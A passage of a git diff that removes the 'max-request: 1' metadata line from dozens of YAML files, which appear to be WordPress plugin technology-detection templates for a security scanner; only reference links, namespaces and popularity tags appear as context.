--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
